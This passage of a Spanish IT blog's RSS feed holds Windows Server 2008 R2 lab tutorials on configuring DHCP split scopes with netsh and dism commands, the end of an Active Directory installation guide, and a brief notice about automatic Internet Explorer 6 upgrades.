cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-tiE0ozKOd2w/TxKYGsVAdfI/AAAAAAAAA9E/5SUkm2cuBoc/s1600/4.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-tiE0ozKOd2w/TxKYGsVAdfI/AAAAAAAAA9E/5SUkm2cuBoc/s400/4.jpg" height="198" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Ilustración 5.&nbsp;</b></i><i>Proceso de instalación desatendida (II)</i><span style="text-align: left;">&nbsp;</span></span></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-Mv12V_J4YrM/TxKYMjAxSfI/AAAAAAAAA9M/yuW3PqaVa0s/s1600/5.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-Mv12V_J4YrM/TxKYMjAxSfI/AAAAAAAAA9M/yuW3PqaVa0s/s400/5.jpg" height="198" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Ilustración 6.&nbsp;</b></i><i>Proceso de instalación desatendida (III)</i></span></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-fHWLOD-amiU/TxKYTQen49I/AAAAAAAAA9U/yyp8afjuWQY/s1600/6.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-fHWLOD-amiU/TxKYTQen49I/AAAAAAAAA9U/yyp8afjuWQY/s400/6.jpg" height="198" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Ilustración 7.&nbsp;</b></i><i>Proceso de instalación desatendida (IV)</i></span></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-bS0oFHOfmmE/TxKYZHkQn-I/AAAAAAAAA9c/poyWwB9I1qQ/s1600/7.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-bS0oFHOfmmE/TxKYZHkQn-I/AAAAAAAAA9c/poyWwB9I1qQ/s400/7.jpg" height="198" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;"><i><b>Ilustración 8.&nbsp;</b></i><i>Proceso de instalación desatendida (V)</i></span></td></tr></tbody></table><div style="text-align: justify;"><span style="font-size: small;">Una vez completado el proceso, la máquina se reiniciará de forma automática y ya dispondremos del primer controlador de dominio de nuestro bosque.</span></div></div><div style="text-align: left;"><div style="text-align: justify;"><span style="font-size: small;"><br /></span></div></div><div style="text-align: left;"><div style="text-align: justify;"><span style="font-size: small;">Y con esto termino esta primera parte del tutorial.</span></div></div></div></td></tr></tbody></table>]]></description>
      
    </item>
    
    
    
    <item>
      <title>Muerte súbita para Internet Explorer 6 a partir de Enero de 2012</title>
      <link>https://www.igalvan.es/posts/muerte-subita-para-internet-explorer-6_3087/</link>
      <pubDate>Fri, 16 Dec 2011 17:05:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/muerte-subita-para-internet-explorer-6_3087/</guid>
      <description><![CDATA[<p>Aviso a los administradores de sistemas despistados puesto que <i>Microsoft</i> va a obligar a actualizar IE6 mediante una actualización automática a partir de Enero de 2012. Más información en <a href="http://windowsteamblog.com/ie/b/ie/archive/2011/12/15/ie-to-start-automatic-upgrades-across-windows-xp-windows-vista-and-windows-7.aspx" target="_blank"><a href="http://windowsteamblog.com/ie/b/ie/archive/2011/12/15/ie-to-start-automatic-upgrades-across-windows-xp-windows-vista-and-windows-7.aspx">http://windowsteamblog.com/ie/b/ie/archive/2011/12/15/ie-to-start-automatic-upgrades-across-windows-xp-windows-vista-and-windows-7.aspx</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Ámbitos divididos en DHCP. Dotando de alta disponibilidad al servicio DHCP (y III)</title>
      <link>https://www.igalvan.es/posts/ambitos-divididos-en-dhcp-dotando-de_6377/</link>
      <pubDate>Sun, 30 Oct 2011 00:00:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ambitos-divididos-en-dhcp-dotando-de_6377/</guid>
      <description><![CDATA[<p><br />Continuo con la tercera y última parte de este laboratorio de ámbitos divididos en dos servidores DHCP. La primera parte del artículo de este laboratorio se encuentra <a href="http://www.igalvit.es/2011/09/ambitos-divididos-en-dhcp-dotando-de.html" target="_blank">aquí</a> mientras que la segunda parte se puede localizar <a href="http://www.igalvit.es/2011/09/ambitos-divididos-en-dhcp-dotando-de_26.html" target="_blank">aquí</a>.<br /><br /><a name='more'></a><br />Una vez completada la configuración de ambos servidores DHCP y generado el ámbito dividido se va a proceder a probar el servicio. Para ello se utilizará la máquina WS1 a la que se ha configurado una interfaz de red para que obtenga su dirección IP mediante el protocolo DHCP.<br /><br />Una vez arrancada la máquina se comprueba que ha obtenido una dirección del servidor primario SRV1 mediante la ejecución del comando <span style="font-family: &quot;Courier New&quot;,Courier,monospace;">ipconfig</span>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-aL25Z42VcJc/TnuGD_LYlOI/AAAAAAAAA18/l1Ek-4Jyziw/s1600/30b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="197" src="http://3.bp.blogspot.com/-aL25Z42VcJc/TnuGD_LYlOI/AAAAAAAAA18/l1Ek-4Jyziw/s400/30b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Concesión de IP desde SRV1</i></td></tr></tbody></table><br /><div>El siguiente paso es parar el servidor DHCP en SRV1 para que la próxima petición de IP sea atendida por el servidor SRV2. En este laboratorio se ha realizado mediante la herramienta de administración del servidor DHCP.</div><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-InUUa5tWBus/TnuGwGnUlqI/AAAAAAAAA2A/buJ0J2ruAac/s1600/33b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="306" src="http://2.bp.blogspot.com/-InUUa5tWBus/TnuGwGnUlqI/AAAAAAAAA2A/buJ0J2ruAac/s400/33b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Desactivación del servicio DHCP en SRV1</i></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tras renovar la cesión de IP en la máquina WS1 se puede comprobar como la nueva IP corresponde al subrango que proporciona el servidor SRV2.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-DIir6Nr-KiM/TnuHPk9pebI/AAAAAAAAA2E/bKYpj76LqN4/s1600/34b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="197" src="http://1.bp.blogspot.com/-DIir6Nr-KiM/TnuHPk9pebI/AAAAAAAAA2E/bKYpj76LqN4/s400/34b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Concesión de una nueva IP desde SRV2</i></td></tr></tbody></table><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Con esto doy por terminado este tutorial sobre la nueva funcionalidad de ámbitos divididos en <i>Windows Server 2008 R2</i>. Si quereis ampliar vuestro conocimiento sobre este tema a continuación os presento algunos enlaces útiles.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="http://technet.microsoft.com/es-es/library/cc775619%28WS.10%29.aspx" target="_blank"><a href="http://technet.microsoft.com/es-es/library/cc775619(WS.10).aspx">http://technet.microsoft.com/es-es/library/cc775619(WS.10).aspx</a></a></div><div class="separator" style="clear: both; text-align: left;"><a href="http://technet.microsoft.com/es-es/library/ee405264%28WS.10%29.aspx" target="_blank"><a href="http://technet.microsoft.com/es-es/library/ee405264(WS.10).aspx">http://technet.microsoft.com/es-es/library/ee405264(WS.10).aspx</a></a></div><div class="separator" style="clear: both; text-align: left;"><a href="http://technet.microsoft.com/en-us/library/dd759192.aspx" target="_blank"><a href="http://technet.microsoft.com/en-us/library/dd759192.aspx">http://technet.microsoft.com/en-us/library/dd759192.aspx</a></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div><br /></div></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Ámbitos divididos en DHCP. Dotando de alta disponibilidad al servicio DHCP (II)</title>
      <link>https://www.igalvan.es/posts/ambitos-divididos-en-dhcp-dotando-de_7347/</link>
      <pubDate>Mon, 26 Sep 2011 19:55:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ambitos-divididos-en-dhcp-dotando-de_7347/</guid>
      <description><![CDATA[<p>Continuo con la segunda parte de este laboratorio de ámbitos divididos en dos servidores DHCP. La primera parte del artículo de este laboratorio se encuentra <a href="http://www.igalvit.es/2011/09/ambitos-divididos-en-dhcp-dotando-de.html">aquí</a>.<br /><br />Una vez que se ha completado la configuración del primer servidor DHCP y verificado su correcto funcionamiento, voy a proceder a instalar el servidor DHCP en el segundo servidor para posteriormente configurar el ámbito dividido desde la consola gráfica de las herramientas de administración de <i>Windows</i> que previamente se ha instalado en la máquina WS1.<br /><br /><a name='more'></a><br />Para instalar el servidor DHCP en el segundo servidor <i>Windows 2008 Server Core</i> es necesario ejecutar el comando siguiente en el servidor SRV2:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">dism /online /Enable-Feature /FeatureName:DHCPServerCore</span></div><div style="text-align: left;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-kE2fw2JZZdQ/TntXyWfF8AI/AAAAAAAAA1U/tMXkC4P2vTA/s1600/2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="193" src="http://3.bp.blogspot.com/-kE2fw2JZZdQ/TntXyWfF8AI/AAAAAAAAA1U/tMXkC4P2vTA/s400/2.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Instalación del rol de servidor DHCP en la máquina SRV2</i></td></tr></tbody></table><div style="text-align: left;">A partir de ahora el resto de la configuración se va a realizar desde la máquina WS1 usando la consola de la herramienta de administración de DHCP.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">El primer paso es lanzar el asistente para generar el ámbito dividido. A este asistente se puede acceder desde un menú contextual pulsando el botón derecho del ratón sobre el ámbito &ldquo;<i>RangoDHCP&rdquo;</i>, seleccionar la opción &ldquo;<i>Opciones avanzadas&hellip;&quot;</i> y finalmente en &ldquo;<i>Ámbitos divididos&rdquo;</i>.</div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-nRhY83587SY/TntYsNdzGKI/AAAAAAAAA1Y/vs-sZr0nzQU/s1600/21.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="281" src="http://1.bp.blogspot.com/-nRhY83587SY/TntYsNdzGKI/AAAAAAAAA1Y/vs-sZr0nzQU/s400/21.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Ejecución del asistente de configuración de ámbitos divididos</i></td></tr></tbody></table>En la primera ventana del asistente se muestra un resumén de la funcionalidad de ámbitos divididos y sus ventajas. Para continuar con el asistente se debe hacer clic en el botón &ldquo;<i>Siguiente&rdquo;</i>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-SBk7RfnwXSs/TntaCa7lU0I/AAAAAAAAA1c/9JinKIcXOXg/s1600/22b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="http://4.bp.blogspot.com/-SBk7RfnwXSs/TntaCa7lU0I/AAAAAAAAA1c/9JinKIcXOXg/s400/22b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Inicio del asistente de configuración de ámbitos divididos</i></td></tr></tbody></table>En la siguiente ventana se debe introducir la IP del servidor adicional, que en el caso de este laboratorio es 192.168.36.50 y se debe hacer clic en el botón &ldquo;<i>Siguiente&rdquo;</i>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-2PZBP8WtZnQ/TntbDg8qGSI/AAAAAAAAA1g/3cqN_GIChqA/s1600/23b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="http://4.bp.blogspot.com/-2PZBP8WtZnQ/TntbDg8qGSI/AAAAAAAAA1g/3cqN_GIChqA/s400/23b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Adicción de datos del servidor DHCP principal al ámbito dividido</i></td></tr></tbody></table>En la siguiente ventana se establece el porcentaje de división del ámbito. Por regla general este siempre mantiene la proporción 80%-20% y en el caso de este laboratorio se mantiene esa proporción quedando dos subrangos, el primero desde la IP 192.168.36.128 hasta la IP 192.168.36.228 (100 IP) y el segundo rango desde la IP 192.168.36.229 hasta la IP 192.168.36.254 (25 IP).<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-JlI0U3hyNkA/TntcyqajYqI/AAAAAAAAA1k/zfYvjAicFDE/s1600/24b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="http://2.bp.blogspot.com/-JlI0U3hyNkA/TntcyqajYqI/AAAAAAAAA1k/zfYvjAicFDE/s400/24b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Configuración del porcentaje de división</i></td></tr></tbody></table>El siguiente paso es la configuración del tiempo de demora para la distribución de direcciones IP (DHCP OFFER) tanto en el servidor principal como en el servidor secundario. En el caso de este laboratorio se ha establecido una demora de 0 milisegundos para el servidor principal y de 700 milisegundos para el servidor agregado. Una vez establecidos los tiempos de demora se debe hacer clic en el botón &ldquo;<i>Siguiente&rdquo;</i>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-e_fe-36OcF0/Tntd4rNA3uI/AAAAAAAAA1o/kUlkMclXk2A/s1600/25b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="http://4.bp.blogspot.com/-e_fe-36OcF0/Tntd4rNA3uI/AAAAAAAAA1o/kUlkMclXk2A/s400/25b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Configuración del retraso de DHCP OFFER</i></td></tr></tbody></table>La siguiente pantalla del asistente muestra un resumen de los parametros que se han indicado para la generación del ámbito dividido antes de generarlo. Después de revisar los datos mostrados se hace clic sobre el botón &ldquo;<i>Finalizar</i>&rdquo;.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-krlVl2eoUHc/TntgoVqxegI/AAAAAAAAA1s/UHASOumowto/s1600/26b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="http://3.bp.blogspot.com/-krlVl2eoUHc/TntgoVqxegI/AAAAAAAAA1s/UHASOumowto/s400/26b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: medium; margin-bottom: 0.5em; margin-left: auto; margin-right: auto; padding-bottom: 6px; padding-left: 6px; padding-right: 6px; padding-top: 6px; text-align: center;"><tbody><tr><td class="tr-caption" style="font-size: 13px; padding-top: 4px; text-align: center;"><i>Resumen de la configuración de ámbitos divididos antes de completar la operación</i></td></tr></tbody></table><span class="Apple-style-span" style="font-size: small;">Una vez completado el proceso se volverá a mostrar una ventana donde se resume el estado de todas las tareas realizadas. Una vez comprobado que se han ejecutado todas correctamente se debe hacer clic sobre el botón &ldquo;Close&rdquo;.</span></td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-kANDfiFaNF8/TnthTeipE5I/AAAAAAAAA1w/O_9XKgXpCy8/s1600/27b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="http://2.bp.blogspot.com/-kANDfiFaNF8/TnthTeipE5I/AAAAAAAAA1w/O_9XKgXpCy8/s400/27b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Resumen de la configuración de ámbitos divididos después de completar la operación</i></td></tr></tbody></table>Una vez finalizada la tarea de configuración del ámbito dividido mediante el asistente es posible visualizar el resultado de las operaciones realizadas a través de la consola de administración del servidor DHCP tal y como se muestra en las siguientes dos figuras.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-vn_YGuNVzJM/ToDILUGYUNI/AAAAAAAAA2U/p6e3xQnqHrs/s1600/29b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="173" src="http://4.bp.blogspot.com/-vn_YGuNVzJM/ToDILUGYUNI/AAAAAAAAA2U/p6e3xQnqHrs/s400/29b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Servidor principal de DHCP</i></td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-1Ew9HpO-ETk/TntiV5jePxI/AAAAAAAAA14/vD_B55kJRyE/s1600/28b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="178" src="http://1.bp.blogspot.com/-1Ew9HpO-ETk/TntiV5jePxI/AAAAAAAAA14/vD_B55kJRyE/s400/28b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Servidor agregado de DHCP</i></td></tr></tbody></table>Con este último paso doy por finalizado el segundo artículo de este tutorial. Queda pendiente la última entrega donde se realizan pruebas para demostrar el correcto funcionamiento del ámbito dividido.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Ámbitos divididos en DHCP. Dotando de alta disponibilidad al servicio DHCP (I)</title>
      <link>https://www.igalvan.es/posts/ambitos-divididos-en-dhcp-dotando-de_4523/</link>
      <pubDate>Fri, 23 Sep 2011 21:50:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ambitos-divididos-en-dhcp-dotando-de_4523/</guid>
      <description><![CDATA[<p>Uno de los servicios que más frecuentemente se ofrecen a los usuarios en cualquier organización es el servicio de DHCP y es este uno de los que más incidencias genera cuando falla puesto que se deja al usuario completamente aislado de la red. Por suerte para los administradores de sistemas y redes <i>Microsoft</i> ha implementado una nueva funcionalidad en <i>Windows Server 2008 R2</i> de ámbitos divididos que nos permite dotar de cierta capacidad de alta disponibilidad a este servicio de forma automatizada frente a las antigua configuración manual.<br /><a name='more'></a>Esta nueva configuración emplea un segundo servidor DHCP con una demora de tiempo en su configuración que genera un retraso en la atención de las peticiones DHCP DISCOVER de los clientes DHCP permitiendo al servidor principal responder<span class="Apple-style-span" style="background-color: white;"> con DHCPOFFER. </span>Cuando este servidor primario se encuentre fuera de servicio será el servidor secundario quien se encargue de atender las peticiones y distribuir  las direcciones IP hasta que el servidor primario vuelva a estar disponible.<br /><div><br /><div>Un punto muy importante a tener en cuenta es que ámbitos divididos solo funciona en entornos IPv4 aunque esta sea la situación que se presente de forma mayoritaria en cualquier organización me parece muy importante indicarlo.</div></div><div><br /></div><div>Para demostrar el funcionamiento de esta funcionalidad voy a montar un laboratorio de prueba con dos servidores <i>Windows 2008 R2 Core</i> que suministrarán los servidores DHCP necesarios. Como cliente utilizare un equipo con <i>Windows 2008 R2 SP1</i> con una instalación completa que nos servirá tanto de cliente DHCP como para realizar la parte de configuración de ámbitos divididos.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-xgK5DD0Ly2M/TnzvEofX2aI/AAAAAAAAA2M/eQGTDB12cSA/s1600/Dibujo1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="270" src="http://2.bp.blogspot.com/-xgK5DD0Ly2M/TnzvEofX2aI/AAAAAAAAA2M/eQGTDB12cSA/s400/Dibujo1.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Esquema laboratorio ámbitos divididos DHCP</i></td></tr></tbody></table>Siguiendo la filosofia de <i>Window Server 2008 Core</i> voy a realizar toda la instalación y configuración del servidor DHCP mediante la consola de comandos de <i>Windows Server 2008 Core</i> excepto la parte correspondiente a la configuración de ámbitos divididos que la realizaré de forma gráfica en la máquina cliente WS1. Al mismo tiempo aprovecharé esta máquina WS1 como cliente del servicio DHCP para probar el correcto funcionamiento de la configuración realizada.<br /><br />Comenzamos entonces con el primer paso de este laboratorio que es la instalación del servidor DHCP que se realice mediante el siguiente comando:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">dism /online /Enable-Feature /FeatureName:DHCPServerCore</span></div><div style="text-align: center;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-x80whLzSCrk/TnosUyauw0I/AAAAAAAAA0c/qXwBpso2k5c/s1600/2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="193" src="http://1.bp.blogspot.com/-x80whLzSCrk/TnosUyauw0I/AAAAAAAAA0c/qXwBpso2k5c/s400/2.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Instalación del servidor DHCP</i></td></tr></tbody></table>El siguiente paso es configurar el servicio <i>dhcpserver</i> en modo de arranque automático mediante el siguiente comando:<br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">sc config dhcpserver start= auto</span></div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-C7Qnu1N4AjM/TnotC62L6yI/AAAAAAAAA0k/6zIZqG_8iLs/s1600/4.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="193" src="http://2.bp.blogspot.com/-C7Qnu1N4AjM/TnotC62L6yI/AAAAAAAAA0k/6zIZqG_8iLs/s400/4.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Cambio del tipo de arranque del servicio DHCP</i></td></tr></tbody></table></div><div>El siguiente paso es arrancar el servicio del servidor DHCP mediante el siguiente comando:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">net start dhcpserver</span></div><div style="text-align: center;"><br /></div><div style="text-align: left;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-sersQpriKnc/Tnotc1y59HI/AAAAAAAAA0o/WcapRpdL5Lk/s1600/6.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="193" src="http://2.bp.blogspot.com/-sersQpriKnc/Tnotc1y59HI/AAAAAAAAA0o/WcapRpdL5Lk/s400/6.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Arranque manual del servicio DHCP</i></td></tr></tbody></table>El  siguiente paso es definir el ámbito del servidor DHCP que es nuestro caso hemos denominado <i>RangoDHCP</i> con el direccionamiento 192.168.36.0/24 mediante el siguiente comando:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">netsh dhcp server 192.168.36.40 add scope 192.168.36.0 255.255.255.0 RangoDHCP</span></div><div style="text-align: left;"><br /></div></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-TOEa6ovwjjM/Tno0POyYAfI/AAAAAAAAA0w/shzZSxv0qHQ/s1600/7b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="198" src="http://2.bp.blogspot.com/-TOEa6ovwjjM/Tno0POyYAfI/AAAAAAAAA0w/shzZSxv0qHQ/s400/7b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Definición del ámbito DHCP 192.168.36.9/24</i></td></tr></tbody></table>El siguiente paso es añadir al ámbito el rango de IP que se van a ofrecer a los clientes DHCP que en nuestro caso se corresponde con el rango 192.168.36.128/25 en mediante el comando:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">netsh dhcp server 192.168.36.40 scope 192.168.36.0 add ip range 192.168.36.128 192.168.36.254</span></div><div style="text-align: center;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-z5ONZunSqZA/Tno2e6ujPcI/AAAAAAAAA00/Vh2t7iEqgCo/s1600/9b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="198" src="http://3.bp.blogspot.com/-z5ONZunSqZA/Tno2e6ujPcI/AAAAAAAAA00/Vh2t7iEqgCo/s400/9b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Definición del rango de IP a ofrecer a los clientes</i></td></tr></tbody></table>El siguiente paso es configurar los valores de la puerta de enlace (003) y los servidores DNS (006) que en nuestro laboratorio es la IP 192.168.36.1 para la puerta de enlace y las IP 102.168.36.1 y 192.168.36.2 para los servidores DNS. Este paso se realiza mediante los siguientes comandos:<br /><br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">netsh dhcp server 192.168.36.40 scope 192.168.36.0 set optionvalue 003 IPADDRESS 192.168.36.1</span></div><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">netsh dhcp server 192.168.36.40 scope 192.168.36.0 set optionvalue 006 IPADDRESS 192.168.36.1 192.168.36.2</span></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-LNHOZL1WsbM/Tno4CiKTPRI/AAAAAAAAA08/eNEwYqs3aH4/s1600/12b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="197" src="http://2.bp.blogspot.com/-LNHOZL1WsbM/Tno4CiKTPRI/AAAAAAAAA08/eNEwYqs3aH4/s400/12b.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><i>Configuración de la puerta de enlace y servidores DNS</i></td></tr></tbody></table>El último paso de la configuración en el primer servidor DHCP es activar el ámbito mediante el siguiente comando:<br /><div style="text-align: center;"><span class="Apple-style-span" style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; font-size: x-small;">netsh dhcp server 192.168.36.40 scope 192.168.36.0 set state 1</span></div><div style="text-align: center;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-aOx_i7xDNQs/Tno42hTIv5I/AAAAAAAAA1A/fBLg3VbTXjY/s1600/14b.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="197" 